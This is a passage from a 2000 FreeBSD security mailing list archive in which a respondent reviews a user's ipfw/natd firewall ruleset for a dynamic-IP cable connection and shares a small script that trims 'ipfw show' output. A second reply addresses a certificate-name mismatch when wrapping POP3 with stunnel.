-0500, Sam Carleton wrote: > I have read through the “Setting-up a Dual-Homed Host using IPFW and > NATD”, but the script is not working for me. My setup is a bit > different. My connectivity is via a cable modem. > > * In the article, it looks like the author was setup with a static > external IP address. I have a dynamic ip address. How do I allow the > DHCP server (Cable Modem) broadcasts to get to my outside NIC? Here's what I do, ############ # Info about local net numbers dhcpc_fxp0="64.6.192.0/19" dhcps_fxp0="${dhcpc_fxp0}" net="192.0.2.0/24" iip="192.0.2.254" ibc="192.0.2.255" iif="de0" oif=${natd_interface} # This is a little more efficient, only one ifconfig(8) call set -- `/sbin/ifconfig ${natd_interface} | /usr/bin/fgrep -w inet` oip="$2" obc="$6" [snip] ############ # Let external DHCP work for dhclient_interface in ${network_interfaces}; do eval ifconfig_args=\$ifconfig_${dhclient_interface} case ${ifconfig_args} in [Dd][Hh][Cc][Pp]) eval dhcpc_range=\$dhcpc_$dhclient_interface eval dhcps_range=\$dhcps_$dhclient_interface $fwcmd add pass udp from ${dhcpc_range} 68 to ${dhcps_range} 67 out via ${dhclient_interface} $fwcmd add pass udp from ${dhcps_range} 67 to ${dhcpc_range} 68 in via ${dhclient_interface} $fwcmd add pass udp from 0.0.0.0 68 to 255.255.255.255 67 out via ${dhclient_interface} $fwcmd add pass udp from ${dhcps_range} 67 to 255.255.255.255 68 in via ${dhclient_interface} ;; esac done > * In the article, the author is only allowing the inside connections to > connect to known DNS servers. I run a caching DNS server on the inside > so I need to have the firewall configured so that the internal DNS > server can talk to any other DNS server. These two are only safe to do after you've stopped spoofing and other stuff like that, $fwcmd add pass udp from ${dns_server} to any 53 keep-state $fwcmd add pass tcp from ${dns_server} to any 53 keep-state > * In the article, it looks like the author is allowing things like HTTP > and SSH to come into the firewall machine. I want those things to be > passed onto another internal machine. The rules may or may not change depending on where they are relative to the divert(4) rule. Also, see 'redirect_address' and 'redirect_port' in natd(8). You did not post your natd.conf, so I can't tell if you are already using those. > Attached you will find my modifications to the rc.firewall script and > relavent snips of rc.conf. If you have any thoughts on what I am doing > wrong, please drop me an email. Thanks! A few nitpicks about your ruleset, but nothing absolutely leaped out at me as a problem that would totally break everything. Since you did not tell us exactly what kind of problem you are having, it's hard to know what to look for. I attached a little script I use to help debug my rulesets. It's really simple; it just cuts down on the verbosity of 'ipfw show' a bit. With some minor mods, it can also really nicely work on the rc.firewall script (although it does even help as-is). > ------------rc.conf------------ > firewall_enable="Yes" > firewall_type="Simple" > firewall_script="/etc/rc.firewall" > firewall_quite="No" > natd_program="/sbin/natd" > natd_enable="Yes" > natd_interface="ep0" > natd_flags="-f /etc/natd.conf" When posting questions of this sort, entries relavent to interface setup should be included as well. > ------------rc.firewall------------ > ############ > # Setup system for firewall service. > # $FreeBSD: src/etc/rc.firewall,v 1.30.2.4 2000/05/28 19:17:15 asmodai > Exp $ This is a fairly old version of rc.firewall. [snip] > [Ss][Ii][Mm][Pp][Ll][Ee]) > ############ > # This is a prototype setup for a simple firewall. Configure this > # machine as a named server and ntp server, and point all the machines > # on the inside at this machine for those services. > ############ > > # set these to your outside interface network and netmask and ip > oif="ep0" > # onet="192.0.2.0" > # omask="255.255.255.240" > # oip="192.0.2.1" > > # set these to your inside interface network and netmask and ip > iif="xl1" > inet="192.168.0.0" > imask="255.255.255.0" > iip="192.168.0.6" > > # Stop spoofing > ${fwcmd} add deny all from ${inet}:${imask} to any in via ${oif} > # ${fwcmd} add deny all from ${onet}:${omask} to any in via ${iif} > > # Stop RFC1918 nets on the outside interface > ${fwcmd} add deny all from 10.0.0.0/8 to any via ${oif} > ${fwcmd} add deny all from any to 10.0.0.0/8 out via ${oif} > ${fwcmd} add deny all from 172.16.0.0/12 to any via ${oif} > ${fwcmd} add deny all from any to 172.16.0.0/12 out via ${oif} > ${fwcmd} add deny all from 192.168.0.0/16 to any via ${oif} > ${fwcmd} add deny all from any to 192.168.0.0/16 out via ${oif} > > # Stop draft-manning-dsua-01.txt nets on the outside interface > ${fwcmd} add deny all from 0.0.0.0/8 to any via ${oif} > ${fwcmd} add deny all from any to 0.0.0.0/8 via ${oif} > ${fwcmd} add deny all from 169.254.0.0/16 to any via ${oif} > ${fwcmd} add deny all from any to 169.254.0.0/16 via ${oif} > ${fwcmd} add deny all from 192.0.2.0/24 to any via ${oif} > ${fwcmd} add deny all from any to 192.0.2.0/24 via ${oif} > ${fwcmd} add deny all from 224.0.0.0/4 to any via ${oif} > ${fwcmd} add deny all from any to 224.0.0.0/4 via ${oif} > ${fwcmd} add deny all from 240.0.0.0/4 to any via ${oif} > ${fwcmd} add deny all from any to 240.0.0.0/4 via ${oif} I'd log the above since you should not be seeing them and they can help debug broken NAT setups. > # Allow TCP through if setup succeeded > ${fwcmd} add pass tcp from any to any established > > # Allow IP fragments to pass through > ${fwcmd} add pass all from any to any frag > > # HTTP - Allow access to our web server > ${fwcmd} add pass tcp from any to any 80 setup > > # SMTP - Allow access to sendmail for incoming e-mail > ${fwcmd} add pass tcp from any to any 25 setup > > # FTP - Allow incoming data channel for outgoing connections, > # Reject&Log all incoming control connections > ${fwcmd} add pass tcp from any 20 to any 1024-65535 setup > ${fwcmd} add deny tcp log tcp from any to any 21 in via ${oif} setup ^^^ Typo. > # SSH Login - Allow & Log all incoming > ${fwcmd} add pass log tcp from any to any 22 in via ${oif} setup > > # IDENT - Reset incoming connections > ${fwcmd} add reset tcp from any to any 113 in via ${oif} setup > > # Reject&Log all setup of incoming connections from the outside > ${fwcmd} add deny log tcp from any to any in via ${oif} setup > > # Allow setup of any other TCP connection > ${fwcmd} add pass tcp from any to any setup > > # Allow access to our DNS > # ${fwcmd} add pass tcp from any to ${oif} 53 setup > # ${fwcmd} add pass udp from any to ${oif} 53 > # ${fwcmd} add pass udp from ${oif} 53 to any > > # Allow DNS queries out in the world > ${fwcmd} add pass udp from any 53 to ${oif} > ${fwcmd} add pass udp from ${oif} to any 53 These two previous sets of rules are messed up. You are using an interface as a source and destination argument. > # Allow NTP queries out in the world > ${fwcmd} add pass udp from any 123 to any 123 via ${oif} > ${fwcmd} add pass udp from any 123 to any via ${iif} > ${fwcmd} add pass udp from any to any 123 via ${iif} > > # TRACEROUTE - Allow outgoing, but not incoming > ${fwcmd} add pass udp from any to any 33434-33523 out via ${oif} > > > ### ICMP RULES > > # ICMP packets > # Allow all ICMP packets on internal interface > ${fwcmd} add pass icmp from any to any via ${iif} > > # Allow outgoing pings, but not incoming > ${fwcmd} add pass icmp from any to any icmptypes 8 out via ${oif} > ${fwcmd} add pass icmp from any to any icmptypes 0 in via ${oif} > > # Allow Destination Unreachable, Source Quench, Time Exceeded, and Bad > Head > ${fwcmd} add pass icmp from any to any icmptypes 3,4,11,12 via ${oif} > > # Deny the rest of them > ${fwcmd} add deny icmp from any to any > > > # Everything else is denied by default, unless the > # IPFIREWALL_DEFAULT_TO_ACCEPT option is set in your kernel > # config file. > ;; [snip] -- Crist J. Clark cjclark@alum.mit.edu --SLDf9lqlvOQaIe6s Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=ipfwsh #!/bin/sh # # ipfwsh - 2000/10/28, cjc # # Cut down verbosity of 'ipfw show' output if [ $# -gt 1 ]; then # Bad command line echo "ipfwsh: bad args" >&2 echo "Usage: ipfwsh [iface]" >&2 exit 1 elif [ $# -eq 0 ]; then # Print whole list, just cut expired dynamic rules ipfw show | awk -F'[ ,]' '$5 != 0 { print }' else # An interface name was given, note there is no failure if # name is not valid ipfw show | awk -v"iface=$1" '/^## Dynamic rules:/ { exit } $0 ~ iface { print; next } /(via|recv|xmit)/ { next } { print }' fi --SLDf9lqlvOQaIe6s-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 18 19:57:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.i-dns.net (unknown [203.126.116.228]) by hub.freebsd.org (Postfix) with ESMTP id F343237B479 for ; Sat, 18 Nov 2000 19:57:07 -0800 (PST) Received: from huiminvaio (spnp47087.spnp.nus.edu.sg [137.132.47.97]) by mail.i-dns.net (Postfix) with SMTP id E1283FFC01; Sun, 19 Nov 2000 11:57:32 +0800 (SGT) Message-ID: <000701c051dc$c59dec10$6600a8c0@huiminvaio> Reply-To: "Lim Hui Min" From: "Lim Hui Min" To: "Angelo a.k.a shagy" , References: <20001110134230.29329.qmail@web2904.mail.yahoo.com> Subject: Re: stunnel, outlook express and qpopper Date: Fri, 17 Nov 2000 21:50:30 +0800 Organization: i-DNS.net International MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org make sure your Common Name, when you create your cert, is EXACTLY the same as the server name that you are popping from in outlook express. HM ----- Original Message ----- From: "Angelo a.k.a shagy" To: Sent: Friday, November 10, 2000 9:42 PM Subject: Re: stunnel, outlook express and qpopper > > On Fri, Nov 10, 2000 at 12:55:26AM -0800, Angelo > > a.k.a shagy wrote: > > > Greetings i'm trying to wrap pop3 with stunnell > > (ssl) > > > I'm using FreeBSD 3.4 > > > stunnel 3.4a (from the ports) > > > qpopper 3.1 > > > > > > I start qpopper with the following options > > > "qpopper 192.168.5.1:110 -S" > > > > > > Then stunnel starts up like so > > > "stunnel -d pop3s -r 192.168.5.1:pop3" > > > > > > When trying to access mail through outlook express > > I > > > get the following message. > > > "The server you are connected to is using a > > security > > > certificate that does not match its internet > > address. > > > Do you want to continue using this server?" > > > > > > I've read that IE and Netscape have a hard coded > > list > > > of Certificate Authorities. And you can get this > > > message if you haven't had your server certificate > > > signed by a CA such as verisign. Is this an > > absolute > > > truth *or* is there a way around this? Or am I > > just > > > way off?! > > > > > > Any help would be appreciated > > > > A self-signed certificate worked fine for me back > > when I used to run a > > similar setup (UW-IMAP and POP3, stunnel, and MS > > OE). How did you make > > your cert? > > -- > > > Hi, here is how I created the certificate.... > > First I generated the unencrypted server key > "openssl genrsa -out server.key 1024" > > Then I created a server certificate request with the > unencrypted key > "openssl req -new -days 365 -key server.key -out > newreq.pem" > > Created my own Certificate Authority and self-signed. > (I used CA.pl to do this) > "perl CA.pl -newca" #made a certificate authority > "perl CA.pl -sign" #self-signed the request > #(I got a file named "newcert.pem" > as a result) > > Then I generated a dh file for stunnel > "openssl gendh -out dh 1024" > > Put it all together like so > "cat server.key newcert.pem dh > stunnel.pem" > > I also removed non operational text from > stunnel.pem.....the end result was > simmilar to this. > > ---BEGIN RSA PRIVATE KEY--- > [encoded key] > ---END RSA PRIVATE KEY--- > [empty line here] > ---BEGIN CERTIFICATE--- > [encoded certificate] > ---END CERTIFICATE--- > [empty line here] > ---BEGIN DH PARAMETERS--- > [encoded key] > ---END DH PARAMETERS--- > > > Everything seems to be working fine except for message > that > I get from outlook. > > Thanks, > Ang > > > > > __________________________________________________ > Do You Yahoo!? > Thousands of Stores. Millions of Products. All in one Place. > http://shopping.yahoo.com/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message